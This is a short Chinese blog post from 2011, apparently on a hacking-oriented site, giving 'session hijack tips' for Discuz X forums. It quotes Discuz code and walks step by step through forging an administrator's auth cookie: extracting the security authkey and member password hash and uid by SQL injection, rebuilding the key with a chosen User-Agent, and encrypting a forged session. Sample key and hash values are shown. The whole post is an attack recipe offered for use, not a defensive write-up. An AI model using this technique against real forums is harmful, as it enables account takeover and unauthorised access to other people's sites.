discuz sessoin hijack tips 续

分类:安全 | 2011-08-20 | 撸过 62 次
0人扯谈

前面发的是UCHOME,为免有装B的嫌疑,干脆DISCUZ论坛的SESSION劫持方法也一并公布了。转载请保留原始URL,谢谢.

 

DISCUZ X系列论坛的session和UCHOME不同,生成session使用的authkey不是程序的UCKEY,看看DZ的代码就了解啦:

 

1.浏览器类型和$_config[‘security’][‘authkey’]加起来生成了一个全局的authkey

$this->var[‘authkey’] = md5($_config[‘security’][‘authkey’].$_SERVER[‘HTTP_USER_AGENT’]);

 

2.authcode加密算法的密钥取的是全局的authkey

$key = md5($key != ” ? $key : getglobal(‘authkey’));

 

3.生成的session原文是member表中的HASH和UID。

dsetcookie(‘auth’, authcode(“{$member[‘password’]}t{$member[‘uid’]}”, ‘ENCODE’), $cookietime, 1, true);

 

4. 有了前面三点条件后,就可以伪造session了.

用SQL注入在pre_common_setting表中注出$_config[‘security’][‘authkey’],在pre_common_member表中注出password和uid.

先生成全局的authkey:$k = md5(‘b158e2zmrkmGVcP1′.’AAA’);

再取hash和uid组成seesion原文: $s = “326ed89bc5ca336bcb6f71545b537492″.”t”.”1″;

最后使用authcode生成加密seesion:authcode($s,’ENCODE’,$k);

 

5.绕过DISCUZ的安全验证。

浏览器类型的验证:浏览器类型是密钥中绑定的一部分,所以参照4需要将User-Agent设成AAA。

本站内容均为原创,转载请务必保留署名与链接!
discuz sessoin hijack tips 续:https://www.webshell.cc/613.html
标签:

相关日志